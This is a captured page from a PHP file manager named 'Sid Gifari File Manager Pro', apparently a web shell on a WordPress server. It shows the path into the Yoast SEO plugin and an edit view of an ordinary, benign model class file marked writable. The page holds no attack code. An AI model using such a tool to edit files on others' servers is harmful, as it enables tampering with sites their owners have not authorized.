🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 02:24:53 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
reenrihair.com
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
models
📍 /home/therahul/reenrihair.com/wp-content/plugins/wordpress-seo/src/models
🔄 Refresh
✏️
Editing: indexable-extension.php
Writable
<?php namespace Yoast\WP\SEO\Models; use Yoast\WP\Lib\Model; /** * Abstract class for indexable extensions. */ abstract class Indexable_Extension extends Model { /** * Holds the Indexable instance. * * @var Indexable|null */ protected $indexable = null; /** * Returns the indexable this extension belongs to. * * @return Indexable The indexable. */ public function indexable() { $this->indexable ??= $this->belongs_to( 'Indexable', 'indexable_id', 'id' )->find_one(); return $this->indexable; } }
💾 Save Changes
❌ Cancel